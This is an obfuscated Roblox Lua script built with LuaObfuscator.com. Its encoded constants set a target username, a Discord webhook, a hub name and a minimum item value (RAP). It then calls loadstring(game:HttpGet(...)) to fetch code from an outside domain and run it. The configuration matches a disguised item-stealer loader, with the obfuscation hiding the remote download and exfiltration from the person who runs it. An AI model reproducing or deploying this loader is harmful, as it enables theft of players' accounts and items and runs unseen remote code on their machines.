--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v85=0;local v86;while true do if (v85==1) then return v86;end if (v85==0) then v86=v5(v80,v19);v19=nil;v85=1;end end else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -(1638 -(1523 + 114))))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v81-(v81%((838 + 94) -(857 + 74))) ;else local v82=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v82 + v82))>=v82) and (1 + 0)) or ((0 -0) + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 232 + 812))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + (1042 -(892 + 65)))) ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + ((136 + 48) -(67 + 113)) ;return (v41 * 16777216) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(12 -9) -2 ;local v45=(v20(v43,(3384 -2431) -(802 + 150) ,53 -33 ) * (((2 + 1) -1)^(24 + 8))) + v42 ;local v46=v20(v43,39 -(10 + 8) ,31);local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(443 -(416 + 26))) or (1 + 0) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=439 -(145 + 293) ;v44=1187 -(1069 + 118) ;end elseif (v46==(2477 -(44 + 386))) then return ((v45==(0 -0)) and (v47 * ((1 -(859 -(814 + 45)))/((0 -0) + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1795 -(201 + 571)) ) * (v44 + (v45/(((3 -2) + 1)^(92 -40)))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1 + 2)) then return v6(v51);end if (v49==(1 + 1)) then v51={};for v87=(8 + 878) -(261 + 490 + 134) , #v50 do v51[v87]=v2(v1(v3(v50,v87,v87)));end v49=4 -1 ;end if (v49==(1081 -(1020 + 60))) then v50=v3(v16,v18,(v18 + v48) -((2479 -(87 + 968)) -(630 + 793)) );v18=v18 + v48 ;v49=6 -(17 -13) ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=4 -3 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v65=0;while true do if (v65~=(0 + 0)) then else if (v52==2) then local v95=0 -0 ;while true do if (v95==(1468 -(899 + 568))) then for v101=1 + 0 ,v23() do local v102=0 -0 ;local v103;local v104;while true do if (v102==(603 -(268 + 335))) then v103=0;v104=nil;v102=1;end if (v102~=1) then else while true do if (v103~=0) then else v104=v21();if (v20(v104,291 -(60 + 230) ,573 -(426 + 146) )==(0 + 0)) then local v186=1456 -(282 + 1174) ;local v187;local v188;local v189;local v190;local v191;local v192;while true do if (v186==2) then v191=nil;v192=nil;v186=814 -(569 + 242) ;end if (v186~=0) then else v187=0 -0 ;v188=nil;v186=1;end if (v186==3) then while true do if (v187==(1 + 1)) then v192=nil;while true do if (v188~=(1026 -(706 + 318))) then else while true do if (v189~=(1253 -(721 + 530))) then else local v197=1271 -(945 + 326) ;local v198;local v199;while true do if (v197==0) then v198=0 -0 ;v199=nil;v197=1;end if (v197~=(1 + 0)) then else while true do if (v198~=(700 -(271 + 429))) then else v199=0;while true do if (v199~=(1 + 0)) then else v189=1503 -(1408 + 92) ;break;end if (v199~=0) then else local v209=1086 -(461 + 625) ;while true do if (v209==(1288 -(993 + 295))) then local v212=0 + 0 ;while true do if (v212==0) then if (v20(v191,1172 -(418 + 753) ,1 + 0 )~=1) then else v192[1 + 1 ]=v58[v192[1 + 1 ]];end if (v20(v191,1 + 1 ,531 -(406 + 123) )~=1) then else v192[3]=v58[v192[3]];end v212=1770 -(1749 + 20) ;end if (v212==(1 + 0)) then v209=1;break;end end end if (v209==1) then v199=1323 -(1249 + 73) ;break;end end end end break;end end break;end end end if (1==v189) then local v200=0 + 0 ;local v201;local v202;while true do if (v200~=1) then else while true do if (v201~=(1145 -(466 + 679))) then else v202=0 -0 ;while true do if (v202==1) then v189=2;break;end if (v202==0) then v192={v22(),v22(),nil,nil};if (v190==(1900 -(106 + 1794))) then local v210=0;local v211;while true do if ((0 + 0)~=v210) then else v211=0 + 0 ;while true do if (v211~=(0 -0)) then else v192[3]=v22();v192[4]=v22();break;end end break;end end elseif (v190==1) then v192[3]=v23();elseif (v190==(5 -3)) then v192[3]=v23() -((116 -(4 + 110))^(600 -(57 + 527))) ;elseif (v190~=3) then else local v221=0;local v222;while true do if (v221~=0) then else v222=0;while true do if ((1427 -(41 + 1386))~=v222) then else v192[3]=v23() -(2^16) ;v192[107 -(17 + 86) ]=v22();break;end end break;end end end v202=1;end end break;end end break;end if (v200~=(0 + 0)) then else v201=0 -0 ;v202=nil;v200=2 -1 ;end end end if (v189==0) then local v203=0;local v204;while true do if (v203~=(166 -(122 + 44))) then else v204=0 -0 ;while true do if (v204==1) then v189=1;break;end if (v204==0) then local v208=0;while true do if (v208==(0 -0)) then v190=v20(v104,2,3 + 0 );v191=v20(v104,1 + 3 ,11 -5 );v208=1;end if (v208~=(66 -(30 + 35))) then else v204=1 + 0 ;break;end end end end break;end end end if (v189~=3) then else if (v20(v191,3,3)==1) then v192[4]=v58[v192[4]];end v53[v101]=v192;break;end end break;end if (v188~=(1257 -(1043 + 214))) then else local v196=0 -0 ;while true do if (v196==(1213 -(323 + 889))) then v188=1;break;end if (v196==(0 -0)) then v189=0;v190=nil;v196=581 -(361 + 219) ;end end end if (1==v188) then v191=nil;v192=nil;v188=322 -(53 + 267) ;end end break;end if ((0 + 0)==v187) then local v194=0;while true do if (v194~=(413 -(15 + 398))) then else v188=0;v189=nil;v194=1;end if (v194~=1) then else v187=1;break;end end end if (v187==(983 -(18 + 964))) then local v195=0;while true do if (1~=v195) then else v187=7 -5 ;break;end if (v195==(0 + 0)) then v190=nil;v191=nil;v195=1 + 0 ;end end end end break;end if (v186~=(851 -(20 + 830))) then else v189=nil;v190=nil;v186=2 + 0 ;end end end break;end end break;end end end v52=129 -(116 + 10) ;break;end if (v95~=0) then else for v105=1 + 0 ,v57 do local v106=0;local v107;local v108;local v109;while true do if (1~=v106) then else v109=nil;while true do if (v107~=(738 -(542 + 196))) then else local v150=0;local v151;while true do if (0==v150) then v151=0;while true do if (v151==1) then v107=1 -0 ;break;end if (v151~=(0 + 0)) then else local v193=0;while true do if ((1 + 0)==v193) then v151=1;break;end if (v193==0) then v108=v21();v109=nil;v193=1;end end end end break;end end end if (v107==(1 + 0)) then if (v108==1) then v109=v21()~=0 ;elseif (v108==(4 -2)) then v109=v24();elseif (v108==3) then v109=v25();end v58[v105]=v109;break;end end break;end if (v106~=0) then else v107=0;v108=nil;v106=2 -1 ;end end end v56[1554 -(1126 + 425) ]=v21();v95=406 -(118 + 287) ;end end end if (v52==3) then local v96=0;local v97;while true do if (v96==0) then v97=0 -0 ;while true do if (v97~=0) then else local v132=1121 -(118 + 1003) ;while true do if (v132~=(0 -0)) then else for v153=1,v23() do v54[v153-(378 -(142 + 235)) ]=v28();end return v56;end end end end break;end end end v65=4 -3 ;end if (v65==1) then if (v52~=(0 + 0)) then else local v98=977 -(553 + 424) ;while true do if (v98~=(1 -0)) then else v55={};v52=1;break;end if (v98~=(0 + 0)) then else v53={};v54={};v98=1 + 0 ;end end end if (v52==1) then local v99=0 + 0 ;while true do if (v99~=(1 + 0)) then else v58={};v52=2 + 0 ;break;end if (v99~=(0 -0)) then else v56={v53,v54,nil,v55};v57=v23();v99=4 -3 ;end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...) local v66=v62;local v67=v63;local v68=v64;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v83=0,v74 do if (v83>=v68) then v72[v83-v68 ]=v73[v83 + 1 ];else v76[v83]=v73[v83 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v84=0;while true do if (v84==1) then if (v79<=4) then if (v79<=1) then if (v79>0) then local v110;local v111,v112;local v113;local v114;v76[v78[2]]=v61[v78[3]];v70=v70 + 1 ;v78=v66[v70];v114=v78[2];v113=v76[v78[3]];v76[v114 + 1 ]=v113;v76[v114]=v113[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v114=v78[2];v111,v112=v69(v76[v114](v13(v76,v114 + 1 ,v78[3])));v71=(v112 + v114) -1 ;v110=0;for v133=v114,v71 do local v134=0;while true do if (v134==0) then v110=v110 + 1 ;v76[v133]=v111[v110];break;end end end v70=v70 + 1 ;v78=v66[v70];v114=v78[2];v76[v114]=v76[v114](v13(v76,v114 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];do return;end else do return;end end elseif (v79<=2) then v61[v78[3]]=v76[v78[2]];elseif (v79==3) then v76[v78[2]]=v61[v78[3]];else local v140=0;while true do if (v140==6) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v140=7;end if (v140==3) then v61[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v140=4;end if (v140==4) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v140=5;end if (v140==9) then v61[v78[3]]=v76[v78[2]];break;end if (v140==5) then v61[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v140=6;end if (v140==8) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v140=9;end if (v140==7) then v61[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v140=8;end if (0==v140) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v140=1;end if (v140==2) then v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v140=3;end if (v140==1) then v61[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v140=2;end end end elseif (v79<=6) then if (v79>5) then v76[v78[2]]();else local v126=v78[2];local v127,v128=v69(v76[v126](v13(v76,v126 + 1 ,v78[3])));v71=(v128 + v126) -1 ;local v129=0;for v135=v126,v71 do v129=v129 + 1 ;v76[v135]=v127[v129];end end elseif (v79<=7) then v76[v78[2]]=v78[3];elseif (v79==8) then local v141=0;local v142;while true do if (v141==0) then v142=v78[2];v76[v142]=v76[v142](v13(v76,v142 + 1 ,v71));break;end end else local v143=v78[2];local v144=v76[v78[3]];v76[v143 + 1 ]=v144;v76[v143]=v144[v78[4]];end v70=v70 + 1 ;break;end if (0==v84) then v78=v66[v70];v79=v78[1];v84=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O0003083O00557365726E616D6503083O005848612O7079424703093O00557365726E616D653203073O00576562682O6F6B03243O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F782F7803073O004875624E616D6503013O0058030A3O004D696E696D756D524150025O006AF840030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E737061636500123O0012043O00023O00124O00013O00124O00023O00124O00033O00124O00053O00124O00043O00124O00073O00124O00063O00124O00093O00124O00083O0012033O000A3O0012010001000B3O00202O00010001000C00122O0003000D6O000100039O0000026O000100016O00017O00",v9(),...);
